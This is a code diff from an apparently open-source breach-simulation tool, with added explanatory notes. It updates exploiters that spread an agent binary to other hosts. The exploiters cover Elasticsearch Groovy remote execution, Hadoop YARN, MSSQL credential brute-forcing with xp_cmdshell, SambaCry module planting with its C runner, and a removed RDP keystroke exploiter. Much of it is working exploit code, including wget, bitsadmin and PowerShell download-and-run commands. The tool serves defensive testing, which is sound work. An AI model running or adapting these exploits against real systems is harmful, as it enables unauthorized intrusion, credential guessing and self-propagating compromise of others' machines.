from infection_monkey.exploit.shellshock import ShellShockExploiter
from infection_monkey.exploit.sambacry import SambaCryExploiter
@ -45,3 +87,5 @@ from infection_monkey.exploit.elasticgroovy import ElasticGroovyExploiter
from infection_monkey.exploit.struts2 import Struts2Exploiter
from infection_monkey.exploit.weblogic import WebLogicExploiter
from infection_monkey.exploit.hadoop import HadoopExploiter
from infection_monkey.exploit.mssqlexec import MSSQLExploiter
from infection_monkey.exploit.vsftpd import VSFTPDExploiter
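The refactor above turns exploit_host() into a template method: a concrete exploiter now declares _EXPLOITED_SERVICE and implements _exploit_host(), while timing, telemetry and the vulnerable-URL/port bookkeeping stay in the base class. A minimal sketch of a new exploiter under this contract (the service and logic are invented for illustration):
from infection_monkey.exploit import HostExploiter

class EchoExploiter(HostExploiter):
    _TARGET_OS_TYPE = ['linux', 'windows']
    _EXPLOITED_SERVICE = 'Echo'      # becomes exploit_info['display_name']

    def _exploit_host(self):
        # pretend the service was exploitable and record what we did
        self.add_vuln_port(7)
        self.add_executed_cmd('echo pwned')
        return True

# Callers keep invoking exploit_host(); the base class stamps exploit_info['started'] / ['finished']
# around this _exploit_host() via pre_exploit() and post_exploit().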

View File

@ -8,8 +8,12 @@ import json
import logging
import requests
from infection_monkey.exploit.web_rce import WebRCE
from infection_monkey.model import WGET_HTTP_UPLOAD, RDP_CMDLINE_HTTP
from infection_monkey.network.elasticfinger import ES_PORT, ES_SERVICE
from infection_monkey.model import WGET_HTTP_UPLOAD, BITSADMIN_CMDLINE_HTTP, CHECK_COMMAND, ID_STRING, CMD_PREFIX,\
DOWNLOAD_TIMEOUT
from infection_monkey.network.elasticfinger import ES_PORT
from common.data.network_consts import ES_SERVICE
from infection_monkey.telemetry.attack.t1197_telem import T1197Telem
from common.utils.attack_utils import ScanStatus, BITS_UPLOAD_STRING
import re
@ -26,6 +30,7 @@ class ElasticGroovyExploiter(WebRCE):
% """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"""
_TARGET_OS_TYPE = ['linux', 'windows']
_EXPLOITED_SERVICE = 'Elastic search'
def __init__(self, host):
super(ElasticGroovyExploiter, self).__init__(host)
@ -34,7 +39,7 @@ class ElasticGroovyExploiter(WebRCE):
exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config()
exploit_config['dropper'] = True
exploit_config['url_extensions'] = ['_search?pretty']
exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': RDP_CMDLINE_HTTP}
exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': CMD_PREFIX +" " + BITSADMIN_CMDLINE_HTTP}
return exploit_config
def get_open_service_ports(self, port_list, names):
@ -47,12 +52,22 @@ class ElasticGroovyExploiter(WebRCE):
def exploit(self, url, command):
command = re.sub(r"\\", r"\\\\\\\\", command)
payload = self.JAVA_CMD % command
response = requests.get(url, data=payload)
try:
response = requests.get(url, data=payload, timeout=DOWNLOAD_TIMEOUT)
except requests.ReadTimeout:
LOG.error("Elastic couldn't upload monkey, because server didn't respond to upload request.")
return False
result = self.get_results(response)
if not result:
return False
return result[0]
def upload_monkey(self, url, commands=None):
result = super(ElasticGroovyExploiter, self).upload_monkey(url, commands)
if 'windows' in self.host.os['type'] and result:
T1197Telem(ScanStatus.USED, self.host, BITS_UPLOAD_STRING).send()
return result
def get_results(self, response):
"""
Extracts the result data from our attack
@ -63,3 +78,20 @@ class ElasticGroovyExploiter(WebRCE):
return json_resp['hits']['hits'][0]['fields'][self.MONKEY_RESULT_FIELD]
except (KeyError, IndexError):
return None
def check_if_exploitable(self, url):
# Overridden web_rce method that adds CMD prefix for windows command
try:
if 'windows' in self.host.os['type']:
resp = self.exploit(url, CMD_PREFIX+" "+CHECK_COMMAND)
else:
resp = self.exploit(url, CHECK_COMMAND)
if resp is True:
return True
elif resp is not False and ID_STRING in resp:
return True
else:
return False
except Exception as e:
LOG.error("Host's exploitability check failed due to: %s" % e)
return False

View File

@ -11,8 +11,9 @@ import logging
import posixpath
from infection_monkey.exploit.web_rce import WebRCE
from infection_monkey.exploit.tools import HTTPTools, build_monkey_commandline, get_monkey_depth
from infection_monkey.model import MONKEY_ARG, ID_STRING
from infection_monkey.exploit.tools.http_tools import HTTPTools
from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_monkey_depth
from infection_monkey.model import MONKEY_ARG, ID_STRING, HADOOP_WINDOWS_COMMAND, HADOOP_LINUX_COMMAND
__author__ = 'VakarisZ'
@ -21,17 +22,8 @@ LOG = logging.getLogger(__name__)
class HadoopExploiter(WebRCE):
_TARGET_OS_TYPE = ['linux', 'windows']
_EXPLOITED_SERVICE = 'Hadoop'
HADOOP_PORTS = [["8088", False]]
# We need to prevent downloading if the monkey already exists, because Hadoop uses multiple threads/nodes
# to download the monkey at the same time
LINUX_COMMAND = "! [ -f %(monkey_path)s ] " \
"&& wget -O %(monkey_path)s %(http_path)s " \
"; chmod +x %(monkey_path)s " \
"&& %(monkey_path)s %(monkey_type)s %(parameters)s"
WINDOWS_COMMAND = "cmd /c if NOT exist %(monkey_path)s bitsadmin /transfer" \
" Update /download /priority high %(http_path)s %(monkey_path)s " \
"& %(monkey_path)s %(monkey_type)s %(parameters)s"
# How long we have our http server open for downloads in seconds
DOWNLOAD_TIMEOUT = 60
# Random string's length that's used for creating unique app name
@ -40,12 +32,15 @@ class HadoopExploiter(WebRCE):
def __init__(self, host):
super(HadoopExploiter, self).__init__(host)
def exploit_host(self):
def _exploit_host(self):
# Try to get exploitable url
urls = self.build_potential_urls(self.HADOOP_PORTS)
self.add_vulnerable_urls(urls, True)
if not self.vulnerable_urls:
return False
# We presume hadoop works only on 64-bit machines
if self.host.os['type'] == 'windows':
self.host.os['machine'] = '64'
paths = self.get_monkey_paths()
if not paths:
return False
@ -55,6 +50,7 @@ class HadoopExploiter(WebRCE):
return False
http_thread.join(self.DOWNLOAD_TIMEOUT)
http_thread.stop()
self.add_executed_cmd(command)
return True
def exploit(self, url, command):
@ -79,9 +75,9 @@ class HadoopExploiter(WebRCE):
# Build command to execute
monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1)
if 'linux' in self.host.os['type']:
base_command = self.LINUX_COMMAND
base_command = HADOOP_LINUX_COMMAND
else:
base_command = self.WINDOWS_COMMAND
base_command = HADOOP_WINDOWS_COMMAND
return base_command % {"monkey_path": path, "http_path": http_path,
"monkey_type": MONKEY_ARG, "parameters": monkey_cmd}

View File

@ -0,0 +1,197 @@
import logging
import os
import sys
from time import sleep
import pymssql
from common.utils.exploit_enum import ExploitType
from infection_monkey.exploit import HostExploiter
from infection_monkey.exploit.tools.http_tools import MonkeyHTTPServer
from infection_monkey.exploit.tools.helpers import get_monkey_dest_path, build_monkey_commandline, get_monkey_depth
from infection_monkey.model import DROPPER_ARG
from infection_monkey.utils.monkey_dir import get_monkey_dir_path
from infection_monkey.exploit.tools.payload_parsing import LimitedSizePayload
from infection_monkey.exploit.tools.exceptions import ExploitingVulnerableMachineError
LOG = logging.getLogger(__name__)
class MSSQLExploiter(HostExploiter):
_EXPLOITED_SERVICE = 'MSSQL'
_TARGET_OS_TYPE = ['windows']
EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
LOGIN_TIMEOUT = 15
# Time in seconds to wait between MSSQL queries.
QUERY_BUFFER = 0.5
SQL_DEFAULT_TCP_PORT = '1433'
# Temporary file that saves commands for monkey's download and execution.
TMP_FILE_NAME = 'tmp_monkey.bat'
TMP_DIR_PATH = "%temp%\\tmp_monkey_dir"
MAX_XP_CMDSHELL_COMMAND_SIZE = 128
XP_CMDSHELL_COMMAND_START = "xp_cmdshell \""
XP_CMDSHELL_COMMAND_END = "\""
EXPLOIT_COMMAND_PREFIX = "<nul set /p="
EXPLOIT_COMMAND_SUFFIX = ">>{payload_file_path}"
CREATE_COMMAND_SUFFIX = ">{payload_file_path}"
MONKEY_DOWNLOAD_COMMAND = "powershell (new-object System.Net.WebClient)." \
"DownloadFile(^\'{http_path}^\' , ^\'{dst_path}^\')"
def __init__(self, host):
super(MSSQLExploiter, self).__init__(host)
self.cursor = None
self.monkey_server = None
self.payload_file_path = os.path.join(MSSQLExploiter.TMP_DIR_PATH, MSSQLExploiter.TMP_FILE_NAME)
def _exploit_host(self):
"""
First, this method brute-forces the MSSQL credentials to obtain a connection (cursor).
Note: start_monkey_server() must be called before self.upload_monkey(), and stop_monkey_server() after it.
"""
# Brute force to get connection
username_passwords_pairs_list = self._config.get_exploit_user_password_pairs()
self.cursor = self.brute_force(self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, username_passwords_pairs_list)
# Create dir for payload
self.create_temp_dir()
try:
self.create_empty_payload_file()
self.start_monkey_server()
self.upload_monkey()
self.stop_monkey_server()
# Clear payload to pass in another command
self.create_empty_payload_file()
self.run_monkey()
self.remove_temp_dir()
except Exception as e:
raise ExploitingVulnerableMachineError, e.args, sys.exc_info()[2]
return True
def run_payload_file(self):
file_running_command = MSSQLLimitedSizePayload(self.payload_file_path)
return self.run_mssql_command(file_running_command)
def create_temp_dir(self):
dir_creation_command = MSSQLLimitedSizePayload(command="mkdir {}".format(MSSQLExploiter.TMP_DIR_PATH))
self.run_mssql_command(dir_creation_command)
def create_empty_payload_file(self):
suffix = MSSQLExploiter.CREATE_COMMAND_SUFFIX.format(payload_file_path=self.payload_file_path)
tmp_file_creation_command = MSSQLLimitedSizePayload(command="NUL", suffix=suffix)
self.run_mssql_command(tmp_file_creation_command)
def run_mssql_command(self, mssql_command):
array_of_commands = mssql_command.split_into_array_of_smaller_payloads()
if not array_of_commands:
raise Exception("Couldn't execute MSSQL exploiter because payload was too long")
self.run_mssql_commands(array_of_commands)
def run_monkey(self):
monkey_launch_command = self.get_monkey_launch_command()
self.run_mssql_command(monkey_launch_command)
self.run_payload_file()
def run_mssql_commands(self, cmds):
for cmd in cmds:
self.cursor.execute(cmd)
sleep(MSSQLExploiter.QUERY_BUFFER)
def upload_monkey(self):
monkey_download_command = self.write_download_command_to_payload()
self.run_payload_file()
self.add_executed_cmd(monkey_download_command.command)
def remove_temp_dir(self):
# Remove temporary dir we stored payload at
tmp_file_removal_command = MSSQLLimitedSizePayload(command="del {}".format(self.payload_file_path))
self.run_mssql_command(tmp_file_removal_command)
tmp_dir_removal_command = MSSQLLimitedSizePayload(command="rmdir {}".format(MSSQLExploiter.TMP_DIR_PATH))
self.run_mssql_command(tmp_dir_removal_command)
def start_monkey_server(self):
self.monkey_server = MonkeyHTTPServer(self.host)
self.monkey_server.start()
def stop_monkey_server(self):
self.monkey_server.stop()
def write_download_command_to_payload(self):
monkey_download_command = self.get_monkey_download_command()
self.run_mssql_command(monkey_download_command)
return monkey_download_command
def get_monkey_launch_command(self):
dst_path = get_monkey_dest_path(self.monkey_server.http_path)
# Form monkey's launch command
monkey_args = build_monkey_commandline(self.host,
get_monkey_depth() - 1,
dst_path)
suffix = ">>{}".format(self.payload_file_path)
prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX
return MSSQLLimitedSizePayload(command="{} {} {}".format(dst_path, DROPPER_ARG, monkey_args),
prefix=prefix,
suffix=suffix)
def get_monkey_download_command(self):
dst_path = get_monkey_dest_path(self.monkey_server.http_path)
monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.\
format(http_path=self.monkey_server.http_path, dst_path=dst_path)
prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX
suffix = MSSQLExploiter.EXPLOIT_COMMAND_SUFFIX.format(payload_file_path=self.payload_file_path)
return MSSQLLimitedSizePayload(command=monkey_download_command,
suffix=suffix,
prefix=prefix)
def brute_force(self, host, port, users_passwords_pairs_list):
"""
Starts the brute-force connection attempts and, if needed, initializes the payload process.
Main loop starts here.
Args:
host (str): Host ip address
port (str): Tcp port that the host listens to
users_passwords_pairs_list (list): a list of users and passwords pairs to bruteforce with
Return:
A pymssql cursor for the first successful connection; raises RuntimeError if no credential pair works
"""
# Main loop
# Iterates on users list
for user, password in users_passwords_pairs_list:
try:
# Core steps
# Trying to connect
conn = pymssql.connect(host, user, password, port=port, login_timeout=self.LOGIN_TIMEOUT)
LOG.info(
'Successfully connected to host: {0}, using user: {1}, password (SHA-512): {2}'.format(
host, user, self._config.hash_sensitive_data(password)))
self.add_vuln_port(MSSQLExploiter.SQL_DEFAULT_TCP_PORT)
self.report_login_attempt(True, user, password)
cursor = conn.cursor()
return cursor
except pymssql.OperationalError:
self.report_login_attempt(False, user, password)
# Combo didn't work, moving on to the next one
pass
LOG.warning('No user/password combo was able to connect to host: {0}:{1}, '
'aborting brute force'.format(host, port))
raise RuntimeError("Bruteforce process failed on host: {0}".format(self.host.ip_addr))
class MSSQLLimitedSizePayload(LimitedSizePayload):
def __init__(self, command, prefix="", suffix=""):
super(MSSQLLimitedSizePayload, self).__init__(command=command,
max_length=MSSQLExploiter.MAX_XP_CMDSHELL_COMMAND_SIZE,
prefix=MSSQLExploiter.XP_CMDSHELL_COMMAND_START+prefix,
suffix=suffix+MSSQLExploiter.XP_CMDSHELL_COMMAND_END)
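xp_cmdshell input is kept under MAX_XP_CMDSHELL_COMMAND_SIZE by never sending one long line: each command is appended to the temporary .bat file in wrapped chunks and the file is then executed. LimitedSizePayload itself is not part of this diff, so the following is only a sketch of the chunking idea, under the assumption that split_into_array_of_smaller_payloads() wraps each slice with the configured prefix and suffix:
# Sketch only -- the real LimitedSizePayload lives in exploit.tools.payload_parsing, not shown here.
def split_payload(command, prefix, suffix, max_length):
    """Chunk `command` so every prefix + chunk + suffix string fits within max_length."""
    room = max_length - len(prefix) - len(suffix)
    chunks = [command[i:i + room] for i in range(0, len(command), room)]
    return [prefix + chunk + suffix for chunk in chunks]

pieces = split_payload(
    'powershell (new-object System.Net.WebClient).DownloadFile(...)',   # illustrative command
    prefix='xp_cmdshell "<nul set /p=',
    suffix='>>%temp%\\tmp_monkey_dir\\tmp_monkey.bat"',
    max_length=128)
# Each element is one xp_cmdshell call that appends another slice of the command to the .bat file.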

View File

@ -1,334 +0,0 @@
import os.path
import threading
import time
from logging import getLogger
import rdpy.core.log as rdpy_log
import twisted.python.log
from rdpy.core.error import RDPSecurityNegoFail
from rdpy.protocol.rdp import rdp
from twisted.internet import reactor
from infection_monkey.exploit import HostExploiter
from infection_monkey.exploit.tools import HTTPTools, get_monkey_depth
from infection_monkey.exploit.tools import get_target_monkey
from infection_monkey.model import RDP_CMDLINE_HTTP_BITS, RDP_CMDLINE_HTTP_VBS
from infection_monkey.network.tools import check_tcp_port
from infection_monkey.exploit.tools import build_monkey_commandline
__author__ = 'hoffer'
KEYS_INTERVAL = 0.1
MAX_WAIT_FOR_UPDATE = 120
KEYS_SENDER_SLEEP = 0.01
DOWNLOAD_TIMEOUT = 60
RDP_PORT = 3389
LOG = getLogger(__name__)
def twisted_log_func(*message, **kw):
if kw.get('isError'):
error_msg = 'Unknown'
if 'failure' in kw:
error_msg = kw['failure'].getErrorMessage()
LOG.error("Error from twisted library: %s" % (error_msg,))
else:
LOG.debug("Message from twisted library: %s" % (str(message),))
def rdpy_log_func(message):
LOG.debug("Message from rdpy library: %s" % (message,))
twisted.python.log.msg = twisted_log_func
rdpy_log._LOG_LEVEL = rdpy_log.Level.ERROR
rdpy_log.log = rdpy_log_func
# thread for twisted reactor, create once.
global g_reactor
g_reactor = threading.Thread(target=reactor.run, args=(False,))
class ScanCodeEvent(object):
def __init__(self, code, is_pressed=False, is_special=False):
self.code = code
self.is_pressed = is_pressed
self.is_special = is_special
class CharEvent(object):
def __init__(self, char, is_pressed=False):
self.char = char
self.is_pressed = is_pressed
class SleepEvent(object):
def __init__(self, interval):
self.interval = interval
class WaitUpdateEvent(object):
def __init__(self, updates=1):
self.updates = updates
pass
def str_to_keys(orig_str):
result = []
for c in orig_str:
result.append(CharEvent(c, True))
result.append(CharEvent(c, False))
result.append(WaitUpdateEvent())
return result
class KeyPressRDPClient(rdp.RDPClientObserver):
def __init__(self, controller, keys, width, height, addr):
super(KeyPressRDPClient, self).__init__(controller)
self._keys = keys
self._addr = addr
self._update_lock = threading.Lock()
self._wait_update = False
self._keys_thread = threading.Thread(target=self._keysSender)
self._keys_thread.daemon = True
self._width = width
self._height = height
self._last_update = 0
self.closed = False
self.success = False
self._wait_for_update = None
def onUpdate(self, destLeft, destTop, destRight, destBottom, width, height, bitsPerPixel, isCompress, data):
update_time = time.time()
self._update_lock.acquire()
self._last_update = update_time
self._wait_for_update = False
self._update_lock.release()
def _keysSender(self):
LOG.debug("Starting to send keystrokes")
while True:
if self.closed:
return
if len(self._keys) == 0:
reactor.callFromThread(self._controller.close)
LOG.debug("Closing RDP connection to %s:%s", self._addr.host, self._addr.port)
return
key = self._keys[0]
self._update_lock.acquire()
time_diff = time.time() - self._last_update
if type(key) is WaitUpdateEvent:
self._wait_for_update = True
self._update_lock.release()
key.updates -= 1
if key.updates == 0:
self._keys = self._keys[1:]
elif time_diff > KEYS_INTERVAL and (not self._wait_for_update or time_diff > MAX_WAIT_FOR_UPDATE):
self._wait_for_update = False
self._update_lock.release()
if type(key) is ScanCodeEvent:
reactor.callFromThread(self._controller.sendKeyEventScancode, key.code, key.is_pressed,
key.is_special)
elif type(key) is CharEvent:
reactor.callFromThread(self._controller.sendKeyEventUnicode, ord(key.char), key.is_pressed)
elif type(key) is SleepEvent:
time.sleep(key.interval)
self._keys = self._keys[1:]
else:
self._update_lock.release()
time.sleep(KEYS_SENDER_SLEEP)
def onReady(self):
time.sleep(1)
reactor.callFromThread(self._controller.sendKeyEventUnicode, ord('Y'), True)
time.sleep(1)
reactor.callFromThread(self._controller.sendKeyEventUnicode, ord('Y'), False)
time.sleep(1)
pass
def onClose(self):
self.success = len(self._keys) == 0
self.closed = True
def onSessionReady(self):
LOG.debug("Logged in, session is ready for work")
self._last_update = time.time()
self._keys_thread.start()
class CMDClientFactory(rdp.ClientFactory):
def __init__(self, username, password="", domain="", command="", optimized=False, width=666, height=359):
self._username = username
self._password = password
self._domain = domain
self._keyboard_layout = "en"
# key sequence: WINKEY+R,cmd /v,Enter,<command>&exit,Enter
self._keys = [SleepEvent(1),
ScanCodeEvent(91, True, True),
ScanCodeEvent(19, True),
ScanCodeEvent(19, False),
ScanCodeEvent(91, False, True), WaitUpdateEvent()] + str_to_keys("cmd /v") + \
[WaitUpdateEvent(), ScanCodeEvent(28, True),
ScanCodeEvent(28, False), WaitUpdateEvent()] + str_to_keys(command + "&exit") + \
[WaitUpdateEvent(), ScanCodeEvent(28, True),
ScanCodeEvent(28, False), WaitUpdateEvent()]
self._optimized = optimized
self._security = rdp.SecurityLevel.RDP_LEVEL_NLA
self._nego = True
self._client = None
self._width = width
self._height = height
self.done_event = threading.Event()
self.success = False
def buildObserver(self, controller, addr):
"""
@summary: Build RFB observer
We use a RDPClient as RDP observer
@param controller: build factory and needed by observer
@param addr: destination address
@return: RDPClientQt
"""
# create client observer
self._client = KeyPressRDPClient(controller, self._keys, self._width, self._height, addr)
controller.setUsername(self._username)
controller.setPassword(self._password)
controller.setDomain(self._domain)
controller.setKeyboardLayout(self._keyboard_layout)
controller.setHostname(addr.host)
if self._optimized:
controller.setPerformanceSession()
controller.setSecurityLevel(self._security)
return self._client
def clientConnectionLost(self, connector, reason):
# try reconnect with basic RDP security
if reason.type == RDPSecurityNegoFail and self._nego:
LOG.debug("RDP Security negotiate failed on %s:%s, starting retry with basic security" %
(connector.host, connector.port))
# stop nego
self._nego = False
self._security = rdp.SecurityLevel.RDP_LEVEL_RDP
connector.connect()
return
LOG.debug("RDP connection to %s:%s closed" % (connector.host, connector.port))
self.success = self._client.success
self.done_event.set()
def clientConnectionFailed(self, connector, reason):
LOG.debug("RDP connection to %s:%s failed, with error: %s" %
(connector.host, connector.port, reason.getErrorMessage()))
self.success = False
self.done_event.set()
class RdpExploiter(HostExploiter):
_TARGET_OS_TYPE = ['windows']
def __init__(self, host):
super(RdpExploiter, self).__init__(host)
def is_os_supported(self):
if super(RdpExploiter, self).is_os_supported():
return True
if not self.host.os.get('type'):
is_open, _ = check_tcp_port(self.host.ip_addr, RDP_PORT)
if is_open:
self.host.os['type'] = 'windows'
return True
return False
def exploit_host(self):
global g_reactor
is_open, _ = check_tcp_port(self.host.ip_addr, RDP_PORT)
if not is_open:
LOG.info("RDP port is closed on %r, skipping", self.host)
return False
src_path = get_target_monkey(self.host)
if not src_path:
LOG.info("Can't find suitable monkey executable for host %r", self.host)
return False
# create server for http download.
http_path, http_thread = HTTPTools.create_transfer(self.host, src_path)
if not http_path:
LOG.debug("Exploiter RdpGrinder failed, http transfer creation failed.")
return False
LOG.info("Started http server on %s", http_path)
cmdline = build_monkey_commandline(self.host, get_monkey_depth() - 1)
if self._config.rdp_use_vbs_download:
command = RDP_CMDLINE_HTTP_VBS % {
'monkey_path': self._config.dropper_target_path_win_32,
'http_path': http_path, 'parameters': cmdline}
else:
command = RDP_CMDLINE_HTTP_BITS % {
'monkey_path': self._config.dropper_target_path_win_32,
'http_path': http_path, 'parameters': cmdline}
user_password_pairs = self._config.get_exploit_user_password_pairs()
if not g_reactor.is_alive():
g_reactor.daemon = True
g_reactor.start()
exploited = False
for user, password in user_password_pairs:
try:
# run command using rdp.
LOG.info("Trying RDP logging into victim %r with user %s and password '%s'",
self.host, user, password)
LOG.info("RDP connected to %r", self.host)
client_factory = CMDClientFactory(user, password, "", command)
reactor.callFromThread(reactor.connectTCP, self.host.ip_addr, RDP_PORT, client_factory)
client_factory.done_event.wait()
if client_factory.success:
exploited = True
self.report_login_attempt(True, user, password)
break
else:
# failed exploiting with this user/pass
self.report_login_attempt(False, user, password)
except Exception as exc:
LOG.debug("Error logging into victim %r with user"
" %s and password '%s': (%s)", self.host,
user, password, exc)
continue
http_thread.join(DOWNLOAD_TIMEOUT)
http_thread.stop()
if not exploited:
LOG.debug("Exploiter RdpGrinder failed, rdp failed.")
return False
elif http_thread.downloads == 0:
LOG.debug("Exploiter RdpGrinder failed, http download failed.")
return False
LOG.info("Executed monkey '%s' on remote victim %r",
os.path.basename(src_path), self.host)
return True

View File

@ -4,9 +4,9 @@ import posixpath
import re
import time
from io import BytesIO
from os import path
import impacket.smbconnection
from impacket.nmb import NetBIOSError
from impacket.nt_errors import STATUS_SUCCESS
from impacket.smb import FILE_OPEN, SMB_DIALECT, SMB, SMBCommand, SMBNtCreateAndX_Parameters, SMBNtCreateAndX_Data, \
FILE_READ_DATA, FILE_SHARE_READ, FILE_NON_DIRECTORY_FILE, FILE_WRITE_DATA, FILE_DIRECTORY_FILE
@ -19,8 +19,11 @@ import infection_monkey.monkeyfs as monkeyfs
from infection_monkey.exploit import HostExploiter
from infection_monkey.model import DROPPER_ARG
from infection_monkey.network.smbfinger import SMB_SERVICE
from infection_monkey.exploit.tools import build_monkey_commandline, get_target_monkey_by_os, get_monkey_depth
from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_target_monkey_by_os, get_monkey_depth
from infection_monkey.exploit.tools.helpers import get_interface_to_target
from infection_monkey.pyinstaller_utils import get_binary_file_path
from common.utils.attack_utils import ScanStatus
from infection_monkey.telemetry.attack.t1105_telem import T1105Telem
__author__ = 'itay.mizeretz'
@ -34,6 +37,7 @@ class SambaCryExploiter(HostExploiter):
"""
_TARGET_OS_TYPE = ['linux']
_EXPLOITED_SERVICE = "Samba"
# Name of file which contains the monkey's commandline
SAMBACRY_COMMANDLINE_FILENAME = "monkey_commandline.txt"
# Name of file which contains the runner's result
@ -50,11 +54,13 @@ class SambaCryExploiter(HostExploiter):
SAMBACRY_MONKEY_COPY_FILENAME_32 = "monkey32_2"
# Monkey copy filename on share (64 bit)
SAMBACRY_MONKEY_COPY_FILENAME_64 = "monkey64_2"
# Supported samba port
SAMBA_PORT = 445
def __init__(self, host):
super(SambaCryExploiter, self).__init__(host)
def exploit_host(self):
def _exploit_host(self):
if not self.is_vulnerable():
return False
@ -62,9 +68,9 @@ class SambaCryExploiter(HostExploiter):
LOG.info("Writable shares and their credentials on host %s: %s" %
(self.host.ip_addr, str(writable_shares_creds_dict)))
self._exploit_info["shares"] = {}
self.exploit_info["shares"] = {}
for share in writable_shares_creds_dict:
self._exploit_info["shares"][share] = {"creds": writable_shares_creds_dict[share]}
self.exploit_info["shares"][share] = {"creds": writable_shares_creds_dict[share]}
self.try_exploit_share(share, writable_shares_creds_dict[share])
# Wait for samba server to load .so, execute code and create result file.
@ -79,15 +85,21 @@ class SambaCryExploiter(HostExploiter):
trigger_result is not None, creds['username'], creds['password'], creds['lm_hash'], creds['ntlm_hash'])
if trigger_result is not None:
successfully_triggered_shares.append((share, trigger_result))
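# Record the exploited share as an smb:// URL so it is included in the exploiter's vulnerability telemetry.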
url = "smb://%(username)s@%(host)s:%(port)s/%(share_name)s" % {'username': creds['username'],
'host': self.host.ip_addr,
'port': self.SAMBA_PORT,
'share_name': share}
self.add_vuln_url(url)
self.clean_share(self.host.ip_addr, share, writable_shares_creds_dict[share])
for share, fullpath in successfully_triggered_shares:
self._exploit_info["shares"][share]["fullpath"] = fullpath
self.exploit_info["shares"][share]["fullpath"] = fullpath
if len(successfully_triggered_shares) > 0:
LOG.info(
"Shares triggered successfully on host %s: %s" % (
self.host.ip_addr, str(successfully_triggered_shares)))
self.add_vuln_port(self.SAMBA_PORT)
return True
else:
LOG.info("No shares triggered successfully on host %s" % self.host.ip_addr)
@ -172,7 +184,7 @@ class SambaCryExploiter(HostExploiter):
if self.is_share_writable(smb_client, share):
writable_shares_creds_dict[share] = credentials
except (impacket.smbconnection.SessionError, SessionError):
except (impacket.smbconnection.SessionError, SessionError, NetBIOSError):
# If these credentials failed, move on and try the others.
pass
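As background for this hunk's broadened error handling, the share-writability probe it protects can be sketched with impacket along the following lines. This is a minimal illustration, not the exploiter's exact code: probe_writable_shares and the marker filename are made up here, and field layouts such as shi1_netname can vary between impacket versions.

import io
import logging

from impacket.nmb import NetBIOSError
from impacket.smbconnection import SMBConnection, SessionError

LOG = logging.getLogger(__name__)
SAMBA_PORT = 445


def probe_writable_shares(ip, username, password):
    """Return the names of shares the given credentials can write to."""
    writable = []
    try:
        conn = SMBConnection(ip, ip, sess_port=SAMBA_PORT)
        conn.login(username, password)
    except (SessionError, NetBIOSError) as err:
        LOG.debug("Could not authenticate to %s: %s", ip, err)
        return writable
    for share in conn.listShares():
        name = share['shi1_netname'][:-1]  # strip the trailing NUL byte
        try:
            # Writing and then deleting a small marker file is the simplest writability test.
            conn.putFile(name, '\\monkey_probe.txt', io.BytesIO(b'probe').read)
            conn.deleteFile(name, '\\monkey_probe.txt')
            writable.append(name)
        except (SessionError, NetBIOSError):
            continue
    conn.logoff()
    return writable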
@ -257,7 +269,10 @@ class SambaCryExploiter(HostExploiter):
with monkeyfs.open(monkey_bin_64_src_path, "rb") as monkey_bin_file:
smb_client.putFile(share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_64, monkey_bin_file.read)
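# Report the upload of the 64-bit monkey binary as MITRE ATT&CK T1105 telemetry.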
T1105Telem(ScanStatus.USED,
get_interface_to_target(self.host.ip_addr),
self.host.ip_addr,
monkey_bin_64_src_path).send()
smb_client.disconnectTree(tree_id)
def trigger_module(self, smb_client, share):

View File

@ -32,7 +32,7 @@ int samba_init_module(void)
const char RUN_MONKEY_CMD[] = "./";
const char MONKEY_DEST_FOLDER[] = "/tmp";
const char MONKEY_DEST_NAME[] = "monkey";
int found = 0;
char modulePathLine[LINE_MAX_LENGTH] = {'\0'};
char commandline[LINE_MAX_LENGTH] = {'\0'};
@ -43,22 +43,22 @@ int samba_init_module(void)
int monkeySize = 0;
void* monkeyBinary = NULL;
struct stat fileStats;
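// Fork: the parent returns so samba_init_module() completes normally, while the child keeps running to launch the monkey.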
pid = fork();
if (0 != pid)
{
// Error, or this is the parent process - nothing to do but return.
return 0;
}
// Find fullpath of running module.
pFile = fopen("/proc/self/maps", "r");
if (NULL == pFile)
{
return 0;
}
while (fgets(modulePathLine, LINE_MAX_LENGTH, pFile) != NULL) {
fileNamePointer = strstr(modulePathLine, RUNNER_FILENAME);
if (fileNamePointer != NULL) {
@ -66,44 +66,42 @@ int samba_init_module(void)
break;
}
}
fclose(pFile);
// We couldn't find ourselves in the module list - bail out.
if (0 == found)
{
return 0;
}
monkeyDirectory = strchr(modulePathLine, '/');
*fileNamePointer = '\0';
if (0 != chdir(monkeyDirectory))
{
return 0;
}
// Write file to indicate we're running
pFile = fopen(RUNNER_RESULT_FILENAME, "w");
if (NULL == pFile)
{
return 0;
}
fwrite(monkeyDirectory, 1, strlen(monkeyDirectory), pFile);
fclose(pFile);
// Read commandline
pFile = fopen(COMMANDLINE_FILENAME, "r");
if (NULL == pFile)
{
return 0;
}
// Build commandline
strncat(commandline, RUN_MONKEY_CMD, sizeof(RUN_MONKEY_CMD) - 1);
strncat(commandline, MONKEY_DEST_NAME, sizeof(MONKEY_DEST_NAME) - 1);
strncat(commandline, " ", 1);
snprintf(commandline, sizeof(commandline), "%s%s ", RUN_MONKEY_CMD, MONKEY_DEST_NAME);
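// Append the arguments read from the commandline helper file after the "./monkey " prefix.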
fread(commandline + strlen(commandline), 1, LINE_MAX_LENGTH, pFile);
fclose(pFile);

View File

@ -4,4 +4,4 @@
extern int samba_init_module(void);
extern int init_samba_module(void);
#endif // monkey_runner_h__
#endif // monkey_runner_h__

View File

@ -6,11 +6,13 @@ from random import choice
import requests
from common.utils.attack_utils import ScanStatus
from infection_monkey.exploit import HostExploiter
from infection_monkey.exploit.tools import get_target_monkey, HTTPTools, get_monkey_depth
from infection_monkey.exploit.tools.helpers import get_target_monkey, get_monkey_depth, build_monkey_commandline
from infection_monkey.model import DROPPER_ARG
from infection_monkey.exploit.shellshock_resources import CGI_FILES
from infection_monkey.exploit.tools import build_monkey_commandline
